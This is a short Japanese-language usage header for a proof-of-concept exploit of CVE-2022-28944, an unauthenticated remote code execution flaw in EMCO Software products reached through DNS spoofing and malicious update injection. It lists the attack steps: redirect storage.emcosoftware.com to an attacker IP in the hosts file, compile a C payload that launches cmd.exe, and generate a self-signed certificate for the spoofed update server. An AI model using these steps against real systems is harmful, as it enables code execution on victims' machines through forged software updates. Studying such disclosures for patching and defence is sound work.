
EMCO Software製品における、DNSスプーフィングと悪意のあるアップデート注入を介した未認証のリモートコード実行の概念実証エクスプロイト。
EMCO Software の複数製品における、認証されていない更新によるリモートコード実行の脆弱性。
使用方法: python3 cve-2022-28944_poc.py
詳細はレポート gerr.re を参照してください。
storage.emcosoftware.com のスプーフィングを攻撃者側の IP に設定します。
c:\windows\system32\drivers\etc\hosts を編集します。
proof.c をコンパイルします。例: i686-w64-mingw32-gcc proof.c -o proof.exe を使用します。#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com" を使用します。